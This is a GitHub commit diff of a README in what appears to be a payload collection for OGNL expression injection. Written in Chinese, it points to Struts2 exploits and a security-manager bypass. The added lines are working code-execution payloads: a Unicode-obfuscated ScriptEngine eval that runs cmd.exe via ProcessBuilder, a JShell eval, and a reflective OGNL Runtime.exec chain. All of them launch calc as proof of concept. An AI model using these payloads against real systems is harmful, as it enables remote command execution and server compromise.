We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 56c34fd commit f28035cCopy full SHA for f28035c
1 file changed
shell/OGNL/Readme.md
@@ -3,7 +3,11 @@
3
new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码)
4
5
new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B");
6
+可参考s2的exp
7
+jdk9+
8
+@jdk.jshell.Jshell@create().eval('code');
9
10
+${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))}
11
```
12
## bypass sm
13
参考 js的bypass
0 commit comments